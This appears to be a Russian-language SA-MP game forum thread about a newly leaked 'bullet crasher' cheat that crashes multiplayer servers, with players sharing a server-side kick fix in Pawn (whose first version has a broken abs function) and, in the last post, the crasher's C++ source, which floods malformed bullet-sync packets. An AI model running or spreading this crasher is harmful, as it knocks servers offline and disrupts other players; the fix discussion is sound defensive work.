Новый крашер
#1

Привет ребятки! сегодня слили новый крашер в паблик... на всех серверах уже крашат, и онлайн сильно сильно упал...

Что поэтому думаете?
Reply
#2

Что тут думать,херово,надо фиксить.
Принцип работы никто не разобрал ещё?
Reply
#3

Сурс в паблике вроде как. Иди и разбирай принцип работы.
Reply
#4

Quote:
Originally Posted by Nixon13
Посмотреть сообщение
Что тут думать,херово,надо фиксить.
Принцип работы никто не разобрал ещё?
KaZax уже выложил его версию фикса
Reply
#5

Quote:
Originally Posted by Fich
Посмотреть сообщение
KaZax уже выложил его версию фикса
Благодарю за инфу.
Reply
#6

PHP код:
public OnPlayerWeaponShot(playeridweaponidhittypehitidFloat:fXFloat:fYFloat:fZ)
{
    if(
hittype == BULLET_HIT_TYPE_PLAYER && (fabs(fX) > 10.0 || fabs(fY) > 10.0 || fabs(fZ) > 10.0)) return Kick(playerid);
    return 
1;
}
Float:fabs(Float:f) return (0) ? (-f) : (f); 
Reply
#7

Quote:
Originally Posted by XemyL
Посмотреть сообщение
PHP код:
public OnPlayerWeaponShot(playeridweaponidhittypehitidFloat:fXFloat:fYFloat:fZ)
{
    if(
hittype == BULLET_HIT_TYPE_PLAYER && (fabs(fX) > 10.0 || fabs(fY) > 10.0 || fabs(fZ) > 10.0)) return Kick(playerid);
    return 
1;
}
Float:fabs(Float:f) return (0) ? (-f) : (f); 
Вы про функцию floatabs никогда не слышали
Reply
#8

Тема с фиксом от KaZax:

https://sampforum.blast.hk/showthread.php?tid=535543
Reply
#9

Quote:
Originally Posted by Stepashka
Посмотреть сообщение
Вы про функцию floatabs никогда не слышали
Да писал функцию для integer, написал заодно и для float, бывает
Reply
#10

Quote:
Originally Posted by Silicium
Посмотреть сообщение
Сурс в паблике вроде как. Иди и разбирай принцип работы.
У вас есть ссылка? Если есть, поделитесь, пожалуйста.
upd: нашел.

Код:
void cheat_generic_bullet_crasher()
{
    if(cheat_state->_generic.bullet_crasher) //by urShadow for BlastHack.Net
    {
        static DWORD time;
        if(GetTickCount() - 40 > time)
        {
            BULLET_SYNC_DATA sBulletSync;
            memset(&sBulletSync, 0, sizeof(BULLET_SYNC_DATA));       
 
            sBulletSync.byteHitType = 1;
            sBulletSync.usHitID = g_Players->sLocalPlayerID;
            float fValue = (float)0x7777777B;
            sBulletSync.fCenterOfHit[0] = fValue;
            sBulletSync.fCenterOfHit[1] = fValue;
            sBulletSync.fCenterOfHit[2] = fValue;                   
 
            RakNet::BitStream bsBulletSync;
            bsBulletSync.Write((BYTE)ID_BULLET_SYNC);
            bsBulletSync.Write((PCHAR)&sBulletSync, sizeof(BULLET_SYNC_DATA));
            pSAMP->Send(&bsBulletSync);       
           
            time = GetTickCount();
        }
    }
}
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)